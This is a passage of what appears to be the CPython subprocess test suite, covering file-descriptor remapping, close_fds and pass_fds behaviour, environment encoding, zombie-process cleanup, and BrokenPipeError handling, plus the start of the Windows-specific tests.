            for fd, temp_fd in enumerate(temp_fds):
                os.dup2(temp_fd, fd)

            # now use those files in the "wrong" order, so that subprocess
            # has to rearrange them in the child
            p = subprocess.Popen([sys.executable, "-c",
                'import sys; got = sys.stdin.read();'
                'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
                stdin=temp_fds[1],
                stdout=temp_fds[2],
                stderr=temp_fds[0])
            p.wait()
        finally:
            self._restore_fds(saved_fds)

        # Rewind and read back what the child wrote to each file.
        for fd in temp_fds:
            os.lseek(fd, 0, 0)

        out = os.read(temp_fds[2], 1024)
        err = os.read(temp_fds[0], 1024).strip()
        self.assertEqual(out, b"got STDIN")
        self.assertEqual(err, b"err")
    finally:
        for fd in temp_fds:
            os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
    # Map the three temp files onto fds 0-2 and then hand them to the
    # child in the given (possibly swapped) roles; verifies the child
    # remapping does not clobber any of them (#12607).
    # open up some temporary files
    temps = [tempfile.mkstemp() for i in range(3)]
    temp_fds = [fd for fd, fname in temps]
    try:
        # unlink the files -- we won't need to reopen them
        for fd, fname in temps:
            os.unlink(fname)

        # save a copy of the standard file descriptors
        saved_fds = self._save_fds(range(3))
        try:
            # duplicate the temp files over the standard fd's 0, 1, 2
            for fd, temp_fd in enumerate(temp_fds):
                os.dup2(temp_fd, fd)

            # write some data to what will become stdin, and rewind
            os.write(stdin_no, b"STDIN")
            os.lseek(stdin_no, 0, 0)

            # now use those files in the given order, so that subprocess
            # has to rearrange them in the child
            p = subprocess.Popen([sys.executable, "-c",
                'import sys; got = sys.stdin.read();'
                'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
                stdin=stdin_no,
                stdout=stdout_no,
                stderr=stderr_no)
            p.wait()

            # Rewind and read back while fds 0-2 still point at the
            # temp files.
            for fd in temp_fds:
                os.lseek(fd, 0, 0)

            out = os.read(stdout_no, 1024)
            err = os.read(stderr_no, 1024).strip()
        finally:
            self._restore_fds(saved_fds)

        self.assertEqual(out, b"got STDIN")
        self.assertEqual(err, b"err")
    finally:
        for fd in temp_fds:
            os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
    # itertools.permutations(range(3)) yields exactly the six orderings
    # the original spelled out, in the same sequence.
    for role_order in itertools.permutations(range(3)):
        self.check_swap_fds(*role_order)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
    # With one of fds 0-2 closed, redirect the two remaining parent fds
    # (from_fds) onto the child std roles to_fds and verify each ended
    # up exactly where requested (#32844).
    saved_fds = self._save_fds(range(3))
    try:
        # Back each source fd with an unlinked temp file.
        for from_fd in from_fds:
            with tempfile.TemporaryFile() as f:
                os.dup2(f.fileno(), from_fd)

        # The one std fd not used as a source is closed outright.
        fd_to_close = (set(range(3)) - set(from_fds)).pop()
        os.close(fd_to_close)

        arg_names = ['stdin', 'stdout', 'stderr']
        kwargs = {}
        for from_fd, to_fd in zip(from_fds, to_fds):
            kwargs[arg_names[to_fd]] = from_fd

        code = textwrap.dedent(r'''
            import os, sys
            skipped_fd = int(sys.argv[1])
            for fd in range(3):
                if fd != skipped_fd:
                    os.write(fd, str(fd).encode('ascii'))
        ''')

        skipped_fd = (set(range(3)) - set(to_fds)).pop()

        rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
                             **kwargs)
        self.assertEqual(rc, 0)

        # Each temp file must contain exactly the child's fd number it
        # was mapped to -- nothing more, nothing less.
        for from_fd, to_fd in zip(from_fds, to_fds):
            os.lseek(from_fd, 0, os.SEEK_SET)
            read_bytes = os.read(from_fd, 1024)
            read_fds = list(map(int, read_bytes.decode('ascii')))
            msg = textwrap.dedent(f"""
                When testing {from_fds} to {to_fds} redirection,
                parent descriptor {from_fd} got redirected
                to descriptor(s) {read_fds} instead of descriptor {to_fd}.
            """)
            self.assertEqual([to_fd], read_fds, msg)
    finally:
        self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
    # Every pair of surviving source fds crossed with every pair of
    # target std roles.
    for source_pair in itertools.combinations(range(3), 2):
        for target_pair in itertools.permutations(range(3), 2):
            self._check_swap_std_fds_with_one_closed(source_pair,
                                                     target_pair)
def test_surrogates_error_message(self):
    # A preexec_fn exception whose message contains lone surrogates
    # must still be reported sensibly; which exception type arrives
    # depends on whether the C _posixsubprocess backend is in use.
    def prepare():
        raise ValueError("surrogate:\uDCff")

    try:
        subprocess.call(
            ZERO_RETURN_CMD,
            preexec_fn=prepare)
    except ValueError as err:
        # Pure Python implementations keeps the message
        self.assertIsNone(subprocess._posixsubprocess)
        self.assertEqual(str(err), "surrogate:\uDCff")
    except subprocess.SubprocessError as err:
        # _posixsubprocess uses a default message
        self.assertIsNotNone(subprocess._posixsubprocess)
        self.assertEqual(str(err), "Exception occurred in preexec_fn.")
    else:
        self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
    # Environment entries containing lone surrogates must round-trip to
    # the child both as str (surrogateescape) and as raw bytes.
    for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
        encoded_value = value.encode("ascii", "surrogateescape")

        # test str with surrogates
        script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
        env = os.environ.copy()
        env[key] = value
        # Use C locale to get ASCII for the locale encoding to force
        # surrogate-escaping of \xFF in the child process
        env['LC_ALL'] = 'C'
        decoded_value = value
        stdout = subprocess.check_output(
            [sys.executable, "-c", script],
            env=env)
        stdout = stdout.rstrip(b'\n\r')
        self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))

        # test bytes
        key = key.encode("ascii", "surrogateescape")
        script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
        env = os.environ.copy()
        env[key] = encoded_value
        stdout = subprocess.check_output(
            [sys.executable, "-c", script],
            env=env)
        stdout = stdout.rstrip(b'\n\r')
        self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
    # The program may be given as bytes: absolute path, shell string,
    # and bare name resolved via both a str and a bytes PATH.
    abs_program = os.fsencode(ZERO_RETURN_CMD[0])
    args = list(ZERO_RETURN_CMD[1:])
    path, program = os.path.split(ZERO_RETURN_CMD[0])
    program = os.fsencode(program)

    # absolute bytes path
    exitcode = subprocess.call([abs_program]+args)
    self.assertEqual(exitcode, 0)

    # absolute bytes path as a string
    cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
    exitcode = subprocess.call(cmd, shell=True)
    self.assertEqual(exitcode, 0)

    # bytes program, unicode PATH
    env = os.environ.copy()
    env["PATH"] = path
    exitcode = subprocess.call([program]+args, env=env)
    self.assertEqual(exitcode, 0)

    # bytes program, bytes PATH
    envb = os.environb.copy()
    envb[b"PATH"] = os.fsencode(path)
    exitcode = subprocess.call([program]+args, env=envb)
    self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
    # Even with close_fds=False, the pipe fds created by Popen for p1
    # must be close-on-exec and therefore invisible to sibling p2.
    sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
    fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

    p1 = subprocess.Popen([sys.executable, sleeper],
                          stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                          stderr=subprocess.PIPE, close_fds=False)

    self.addCleanup(p1.communicate, b'')

    p2 = subprocess.Popen([sys.executable, fd_status],
                          stdout=subprocess.PIPE, close_fds=False)

    output, error = p2.communicate()
    result_fds = set(map(int, output.split(b',')))
    unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
                        p1.stderr.fileno()])

    self.assertFalse(result_fds & unwanted_fds,
                     "Expected no fds from %r to be open in child, "
                     "found %r" %
                          (unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
    """End-to-end qcat | qgrep pipeline with close_fds=False.

    The pipeline only terminates if the pipe fds were correctly marked
    close-on-exec; a leaked write end would make qgrep hang on read.
    """
    qcat = support.findfile("qcat.py", subdir="subprocessdata")
    qgrep = support.findfile("qgrep.py", subdir="subprocessdata")

    subdata = b'zxcvbn'
    data = subdata * 4 + b'\n'

    p1 = subprocess.Popen([sys.executable, qcat],
                          stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                          close_fds=False)

    p2 = subprocess.Popen([sys.executable, qgrep, subdata],
                          stdin=p1.stdout, stdout=subprocess.PIPE,
                          close_fds=False)

    self.addCleanup(p1.wait)
    self.addCleanup(p2.wait)

    # Consistency fix: one terminate helper instead of two duplicated,
    # byte-identical closures.  ProcessLookupError means the child
    # already exited, which is fine.
    def terminate_quietly(proc):
        try:
            proc.terminate()
        except ProcessLookupError:
            pass

    self.addCleanup(terminate_quietly, p1)
    self.addCleanup(terminate_quietly, p2)

    p1.stdin.write(data)
    p1.stdin.close()

    readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)

    self.assertTrue(readfiles, "The child hung")
    self.assertEqual(p2.stdout.read(), data)

    p1.stdout.close()
    p2.stdout.close()
def test_close_fds(self):
    # Verify close_fds semantics: False leaks inheritable fds, True
    # closes them, and pass_fds keeps an explicit allow-list open.
    fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

    fds = os.pipe()
    self.addCleanup(os.close, fds[0])
    self.addCleanup(os.close, fds[1])
    open_fds = set(fds)
    # add a bunch more fds
    for _ in range(9):
        fd = os.open(os.devnull, os.O_RDONLY)
        self.addCleanup(os.close, fd)
        open_fds.add(fd)

    # Mark them inheritable so close_fds is the only thing that can
    # keep them out of the child.
    for fd in open_fds:
        os.set_inheritable(fd, True)

    p = subprocess.Popen([sys.executable, fd_status],
                         stdout=subprocess.PIPE, close_fds=False)
    output, ignored = p.communicate()
    remaining_fds = set(map(int, output.split(b',')))

    self.assertEqual(remaining_fds & open_fds, open_fds,
                     "Some fds were closed")

    p = subprocess.Popen([sys.executable, fd_status],
                         stdout=subprocess.PIPE, close_fds=True)
    output, ignored = p.communicate()
    remaining_fds = set(map(int, output.split(b',')))

    self.assertFalse(remaining_fds & open_fds,
                     "Some fds were left open")
    self.assertIn(1, remaining_fds, "Subprocess failed")

    # Keep some of the fd's we opened open in the subprocess.
    # This tests _posixsubprocess.c's proper handling of fds_to_keep.
    fds_to_keep = set(open_fds.pop() for _ in range(8))
    p = subprocess.Popen([sys.executable, fd_status],
                         stdout=subprocess.PIPE, close_fds=True,
                         pass_fds=fds_to_keep)
    output, ignored = p.communicate()
    remaining_fds = set(map(int, output.split(b',')))

    self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
                     "Some fds not in pass_fds were left open")
    self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
                 os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
                 "Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
    """Confirm that issue21618 is fixed (may fail under valgrind)."""
    fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

    # This launches the meat of the test in a child process to
    # avoid messing with the larger unittest processes maximum
    # number of file descriptors.
    #  This process launches:
    #  +--> Process that lowers its RLIMIT_NOFILE aftr setting up
    #    a bunch of high open fds above the new lower rlimit.
    #    Those are reported via stdout before launching a new
    #    process with close_fds=False to run the actual test:
    #    +--> The TEST: This one launches a fd_status.py
    #      subprocess with close_fds=True so we can find out if
    #      any of the fds above the lowered rlimit are still open.
    # NOTE: the embedded script below is runtime data passed to the
    # child interpreter and must not be altered.
    p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
    '''
    import os, resource, subprocess, sys, textwrap
    open_fds = set()
    # Add a bunch more fds to pass down.
    for _ in range(40):
        fd = os.open(os.devnull, os.O_RDONLY)
        open_fds.add(fd)

    # Leave a two pairs of low ones available for use by the
    # internal child error pipe and the stdout pipe.
    # We also leave 10 more open as some Python buildbots run into
    # "too many open files" errors during the test if we do not.
    for fd in sorted(open_fds)[:14]:
        os.close(fd)
        open_fds.remove(fd)
    for fd in open_fds:
        #self.addCleanup(os.close, fd)
        os.set_inheritable(fd, True)

    max_fd_open = max(open_fds)

    # Communicate the open_fds to the parent unittest.TestCase process.
    print(','.join(map(str, sorted(open_fds))))
    sys.stdout.flush()

    rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
    try:
        # 29 is lower than the highest fds we are leaving open.
        resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
        # Launch a new Python interpreter with our low fd rlim_cur that
        # inherits open fds above that limit.  It then uses subprocess
        # with close_fds=True to get a report of open fds in the child.
        # An explicit list of fds to check is passed to fd_status.py as
        # letting fd_status rely on its default logic would miss the
        # fds above rlim_cur as it normally only checks up to that limit.
        subprocess.Popen(
            [sys.executable, '-c',
             textwrap.dedent("""
                 import subprocess, sys
                 subprocess.Popen([sys.executable, %r] +
                                  [str(x) for x in range({max_fd})],
                                  close_fds=True).wait()
                 """.format(max_fd=max_fd_open+1))],
            close_fds=False).wait()
    finally:
        resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
    ''' % fd_status)], stdout=subprocess.PIPE)

    output, unused_stderr = p.communicate()
    output_lines = output.splitlines()
    self.assertEqual(len(output_lines), 2,
                     msg="expected exactly two lines of output:\n%r" % output)
    opened_fds = set(map(int, output_lines[0].strip().split(b',')))
    remaining_fds = set(map(int, output_lines[1].strip().split(b',')))

    self.assertFalse(remaining_fds & opened_fds,
                     msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
    # Each fd listed in pass_fds must survive close_fds=True while all
    # other inheritable fds are closed.
    fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

    open_fds = set()

    for x in range(5):
        fds = os.pipe()
        self.addCleanup(os.close, fds[0])
        self.addCleanup(os.close, fds[1])
        os.set_inheritable(fds[0], True)
        os.set_inheritable(fds[1], True)
        open_fds.update(fds)

    for fd in open_fds:
        p = subprocess.Popen([sys.executable, fd_status],
                             stdout=subprocess.PIPE, close_fds=True,
                             pass_fds=(fd, ))
        output, ignored = p.communicate()

        remaining_fds = set(map(int, output.split(b',')))
        to_be_closed = open_fds - {fd}

        self.assertIn(fd, remaining_fds, "fd to be passed not passed")
        self.assertFalse(remaining_fds & to_be_closed,
                         "fd to be closed passed")

        # pass_fds overrides close_fds with a warning.
        with self.assertWarns(RuntimeWarning) as context:
            self.assertFalse(subprocess.call(
                    ZERO_RETURN_CMD,
                    close_fds=False, pass_fds=(fd, )))
        self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
    # pass_fds must deliver even a non-inheritable fd to the child,
    # without mutating the inheritable flag in the parent.
    script = support.findfile("fd_status.py", subdir="subprocessdata")

    inheritable, non_inheritable = os.pipe()
    self.addCleanup(os.close, inheritable)
    self.addCleanup(os.close, non_inheritable)
    os.set_inheritable(inheritable, True)
    os.set_inheritable(non_inheritable, False)
    pass_fds = (inheritable, non_inheritable)
    args = [sys.executable, script]
    args += list(map(str, pass_fds))

    p = subprocess.Popen(args,
                         stdout=subprocess.PIPE, close_fds=True,
                         pass_fds=pass_fds)
    output, ignored = p.communicate()
    fds = set(map(int, output.split(b',')))

    # the inheritable file descriptor must be inherited, so its inheritable
    # flag must be set in the child process after fork() and before exec()
    self.assertEqual(fds, set(pass_fds), "output=%a" % output)

    # inheritable flag must not be changed in the parent process
    self.assertEqual(os.get_inheritable(inheritable), True)
    self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
    """Regression test for https://bugs.python.org/issue32270."""
    fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
    pass_fds = []
    for _ in range(2):
        fd = os.open(os.devnull, os.O_RDWR)
        self.addCleanup(os.close, fd)
        pass_fds.append(fd)
    stdout_r, stdout_w = os.pipe()
    self.addCleanup(os.close, stdout_r)
    self.addCleanup(os.close, stdout_w)
    # pass_fds ends up as [devnull, pipe-write-end, devnull]; the pipe
    # write end doubles as the child's stdout redirection target.
    pass_fds.insert(1, stdout_w)
    with subprocess.Popen([sys.executable, fd_status],
                          stdin=pass_fds[0],
                          stdout=pass_fds[1],
                          stderr=pass_fds[2],
                          close_fds=True,
                          pass_fds=pass_fds):
        output = os.read(stdout_r, 1024)
    fds = {int(num) for num in output.split(b',')}
    # The child must see std fds 0-2 plus every fd from pass_fds.
    self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
    """One read/write file object may back both stdout and stdin."""
    inout = io.open(os.devnull, "r+")
    try:
        proc = subprocess.Popen(ZERO_RETURN_CMD,
                                stdout=inout, stdin=inout)
        proc.wait()
    finally:
        inout.close()
def test_stdout_stderr_are_single_inout_fd(self):
    """One read/write file object may back both stdout and stderr."""
    inout = io.open(os.devnull, "r+")
    try:
        proc = subprocess.Popen(ZERO_RETURN_CMD,
                                stdout=inout, stderr=inout)
        proc.wait()
    finally:
        inout.close()
def test_stderr_stdin_are_single_inout_fd(self):
    """One read/write file object may back both stderr and stdin."""
    inout = io.open(os.devnull, "r+")
    try:
        proc = subprocess.Popen(ZERO_RETURN_CMD,
                                stderr=inout, stdin=inout)
        proc.wait()
    finally:
        inout.close()
def test_wait_when_sigchild_ignored(self):
    """Popen must still collect the child's status when SIGCHLD is ignored;
    the helper script does the check itself and reports errors on stderr."""
    # NOTE: sigchild_ignore.py may not be an effective test on all OSes.
    sigchild_ignore = support.findfile("sigchild_ignore.py",
                                       subdir="subprocessdata")
    p = subprocess.Popen([sys.executable, sigchild_ignore],
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = p.communicate()
    self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
                     " non-zero with this error:\n%s" %
                     stderr.decode('utf-8'))
def test_select_unbuffered(self):
    """bufsize=0 must yield an unbuffered pipe usable with select()."""
    # Issue #11459: bufsize=0 should really set the pipes as
    # unbuffered (and therefore let select() work properly).
    select = import_helper.import_module("select")
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys;'
                          'sys.stdout.write("apple")'],
                         stdout=subprocess.PIPE,
                         bufsize=0)
    f = p.stdout
    self.addCleanup(f.close)
    try:
        # A partial read must return immediately, and the remaining byte
        # must make the fd readable according to select().
        self.assertEqual(f.read(4), b"appl")
        self.assertIn(f, select.select([f], [], [], 0.0)[0])
    finally:
        p.wait()
def test_zombie_fast_process_del(self):
    """Dropping the last Popen reference before the child exits must park
    the instance in subprocess._active so it is reaped later (no zombie)."""
    # Issue #12650: on Unix, if Popen.__del__() was called before the
    # process exited, it wouldn't be added to subprocess._active, and would
    # remain a zombie.
    # spawn a Popen, and delete its reference before it exits
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys, time;'
                          'time.sleep(0.2)'],
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    ident = id(p)
    pid = p.pid
    # __del__ on a still-running child emits a ResourceWarning.
    with warnings_helper.check_warnings(('', ResourceWarning)):
        p = None
    if mswindows:
        # subprocess._active is not used on Windows and is set to None.
        self.assertIsNone(subprocess._active)
    else:
        # check that p is in the active processes list
        self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
    """A signal-killed child whose Popen was already deleted must still be
    removed from subprocess._active (no fd / memory leak)."""
    # Issue #12650: on Unix, if Popen.__del__() was called before the
    # process exited, and the process got killed by a signal, it would never
    # be removed from subprocess._active, which triggered a FD and memory
    # leak.
    # spawn a Popen, delete its reference and kill it
    p = subprocess.Popen([sys.executable, "-c",
                          'import time;'
                          'time.sleep(3)'],
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    ident = id(p)
    pid = p.pid
    with warnings_helper.check_warnings(('', ResourceWarning)):
        p = None
        support.gc_collect()  # For PyPy or other GCs.

    os.kill(pid, signal.SIGKILL)
    if mswindows:
        # subprocess._active is not used on Windows and is set to None.
        self.assertIsNone(subprocess._active)
    else:
        # check that p is in the active processes list
        self.assertIn(ident, [id(o) for o in subprocess._active])

    # let some time for the process to exit, and create a new Popen: this
    # should trigger the wait() of p
    time.sleep(0.2)
    with self.assertRaises(OSError):
        with subprocess.Popen(NONEXISTING_CMD,
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE) as proc:
            pass
    # p should have been wait()ed on, and removed from the _active list
    self.assertRaises(OSError, os.waitpid, pid, 0)
    if mswindows:
        # subprocess._active is not used on Windows and is set to None.
        self.assertIsNone(subprocess._active)
    else:
        self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
    """fds duplicated into by preexec_fn must still be closed by
    close_fds=True (close happens after preexec_fn runs)."""
    fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

    # this FD is used as dup2() target by preexec_fn, and should be closed
    # in the child process
    fd = os.dup(1)
    self.addCleanup(os.close, fd)

    p = subprocess.Popen([sys.executable, fd_status],
                         stdout=subprocess.PIPE, close_fds=True,
                         preexec_fn=lambda: os.dup2(1, fd))
    output, ignored = p.communicate()

    remaining_fds = set(map(int, output.split(b',')))

    self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
    """_posixsubprocess.fork_exec() must raise cleanly (TypeError), not
    crash, when given arguments of the wrong type."""
    # Issue #22290: fork_exec() must not crash on memory allocation failure
    # or other errors
    import _posixsubprocess
    gc_enabled = gc.isenabled()
    try:
        # Use a preexec function and enable the garbage collector
        # to force fork_exec() to re-enable the garbage collector
        # on error.
        func = lambda: None
        gc.enable()

        # Each tuple swaps one argument for an int of the wrong type.
        for args, exe_list, cwd, env_list in (
            (123,      [b"exe"], None, [b"env"]),
            ([b"arg"], 123,      None, [b"env"]),
            ([b"arg"], [b"exe"], 123,  [b"env"]),
            ([b"arg"], [b"exe"], None, 123),
            ):
            with self.assertRaises(TypeError) as err:
                _posixsubprocess.fork_exec(
                    args, exe_list,
                    True, (), cwd, env_list,
                    -1, -1, -1, -1,
                    1, 2, 3, 4,
                    True, True,
                    False, [], 0, -1,
                    func)
            # Attempt to prevent
            # "TypeError: fork_exec() takes exactly N arguments (M given)"
            # from passing the test.  More refactoring to have us start
            # with a valid *args list, confirm a good call with that works
            # before mutating it in various ways to ensure that bad calls
            # with individual arg type errors raise a typeerror would be
            # ideal.  Saving that for a future PR...
            self.assertNotIn('takes exactly', str(err.exception))
    finally:
        # Restore the caller's GC state.
        if not gc_enabled:
            gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
    """fork_exec() must reject malformed fds_to_keep tuples with ValueError."""
    # Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
    import _posixsubprocess

    class BadInt:
        # Converts successfully only on the first __int__ call, to exercise
        # error handling partway through the fd conversion loop.
        first = True
        def __init__(self, value):
            self.value = value
        def __int__(self):
            if self.first:
                self.first = False
                return self.value
            raise ValueError

    gc_enabled = gc.isenabled()
    try:
        gc.enable()

        for fds_to_keep in (
            (-1, 2, 3, 4, 5),  # Negative number.
            ('str', 4),  # Not an int.
            (18, 23, 42, 2**63),  # Out of range.
            (5, 4),  # Not sorted.
            (6, 7, 7, 8),  # Duplicate.
            (BadInt(1), BadInt(2)),
        ):
            with self.assertRaises(
                    ValueError,
                    msg='fds_to_keep={}'.format(fds_to_keep)) as c:
                _posixsubprocess.fork_exec(
                    [b"false"], [b"false"],
                    True, fds_to_keep, None, [b"env"],
                    -1, -1, -1, -1,
                    1, 2, 3, 4,
                    True, True,
                    None, None, None, -1,
                    None)
            self.assertIn('fds_to_keep', str(c.exception))
    finally:
        # Restore the caller's GC state.
        if not gc_enabled:
            gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
    """communicate() must swallow BrokenPipeError raised by stdin.close()."""
    # By not setting stdout or stderr or a timeout we force the fast path
    # that just calls _stdin_write() internally due to our mock.
    proc = subprocess.Popen(ZERO_RETURN_CMD)
    with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
        mock_proc_stdin.close.side_effect = BrokenPipeError
        proc.communicate()  # Should swallow BrokenPipeError from close.
        mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
    """communicate() must swallow BrokenPipeError raised by stdin.write(),
    and still close stdin afterwards."""
    # By not setting stdout or stderr or a timeout we force the fast path
    # that just calls _stdin_write() internally due to our mock.
    proc = subprocess.Popen(ZERO_RETURN_CMD)
    with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
        mock_proc_stdin.write.side_effect = BrokenPipeError
        proc.communicate(b'stuff')  # Should swallow the BrokenPipeError.
        mock_proc_stdin.write.assert_called_once_with(b'stuff')
        mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
    """_communicate() must swallow BrokenPipeError raised by stdin.flush()."""
    # Setting stdin and stdout forces the ._communicate() code path.
    # python -h exits faster than python -c pass (but spams stdout).
    proc = subprocess.Popen([sys.executable, '-h'],
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE)
    with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
            open(os.devnull, 'wb') as dev_null:
        mock_proc_stdin.flush.side_effect = BrokenPipeError
        # because _communicate registers a selector using proc.stdin...
        # give the mock a real fd so the selector can be registered.
        mock_proc_stdin.fileno.return_value = dev_null.fileno()
        # _communicate() should swallow BrokenPipeError from flush.
        proc.communicate(b'stuff')
        mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
    """_communicate() with a timeout must swallow BrokenPipeError from
    stdin.close()."""
    # Setting stdin and stdout forces the ._communicate() code path.
    # python -h exits faster than python -c pass (but spams stdout).
    proc = subprocess.Popen([sys.executable, '-h'],
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE)
    with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
        mock_proc_stdin.close.side_effect = BrokenPipeError
        # _communicate() should swallow BrokenPipeError from close.
        proc.communicate(timeout=999)
        mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
                     and hasattr(_testcapi, 'W_STOPCODE'),
                     'need _testcapi.W_STOPCODE')
def test_stopped(self):
    """Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
    args = ZERO_RETURN_CMD
    proc = subprocess.Popen(args)

    # Wait until the real process completes to avoid zombie process
    support.wait_process(proc.pid, exitcode=0)

    # Fake a stopped (not exited) status; wait() must report -SIGSTOP-style
    # negative returncode instead of hanging or misreporting.
    status = _testcapi.W_STOPCODE(3)
    with mock.patch('subprocess.os.waitpid', return_value=(proc.pid, status)):
        returncode = proc.wait()

    self.assertEqual(returncode, -3)
def test_send_signal_race(self):
    """send_signal() on an already-exited child must not call os.kill()."""
    # bpo-38630: send_signal() must poll the process exit status to reduce
    # the risk of sending the signal to the wrong process.
    proc = subprocess.Popen(ZERO_RETURN_CMD)

    # wait until the process completes without using the Popen APIs.
    support.wait_process(proc.pid, exitcode=0)

    # returncode is still None but the process completed.
    self.assertIsNone(proc.returncode)

    with mock.patch("os.kill") as mock_kill:
        proc.send_signal(signal.SIGTERM)

    # send_signal() didn't call os.kill() since the process already
    # completed.
    mock_kill.assert_not_called()

    # Don't check the returncode value: the test reads the exit status,
    # so Popen failed to read it and uses a default returncode instead.
    self.assertIsNotNone(proc.returncode)
def test_send_signal_race2(self):
    """send_signal()/kill() must not raise if the child exits between the
    returncode check and the kill syscall."""
    # bpo-40550: the process might exit between the returncode check and
    # the kill operation
    p = subprocess.Popen([sys.executable, '-c', 'exit(1)'])

    # wait for process to exit
    while not p.returncode:
        p.poll()

    # Force the race: poll() reports nothing and returncode looks unset,
    # even though the process is already gone.
    with mock.patch.object(p, 'poll', new=lambda: None):
        p.returncode = None
        p.send_signal(signal.SIGTERM)
        p.kill()
def test_communicate_repeated_call_after_stdout_close(self):
    """Repeated communicate() calls must keep working after the child has
    closed its stdout (TimeoutExpired retries until the child exits)."""
    proc = subprocess.Popen([sys.executable, '-c',
                             'import os, time; os.close(1), time.sleep(2)'],
                            stdout=subprocess.PIPE)
    while True:
        try:
            proc.communicate(timeout=0.1)
            return
        except subprocess.TimeoutExpired:
            pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
    """Windows-only Popen behaviour: STARTUPINFO, creationflags, handle
    inheritance, shell invocation, and signal/kill semantics."""

    def test_startupinfo(self):
        # startupinfo argument
        # We use hardcoded constants, because we do not want to
        # depend on win32all.
        STARTF_USESHOWWINDOW = 1
        SW_MAXIMIZE = 3
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags = STARTF_USESHOWWINDOW
        startupinfo.wShowWindow = SW_MAXIMIZE
        # Since Python is a console process, it won't be affected
        # by wShowWindow, but the argument should be silently
        # ignored
        subprocess.call(ZERO_RETURN_CMD,
                        startupinfo=startupinfo)

    def test_startupinfo_keywords(self):
        # startupinfo argument
        # We use hardcoded constants, because we do not want to
        # depend on win32all.
        STARTF_USERSHOWWINDOW = 1
        SW_MAXIMIZE = 3
        startupinfo = subprocess.STARTUPINFO(
            dwFlags=STARTF_USERSHOWWINDOW,
            wShowWindow=SW_MAXIMIZE
        )
        # Since Python is a console process, it won't be affected
        # by wShowWindow, but the argument should be silently
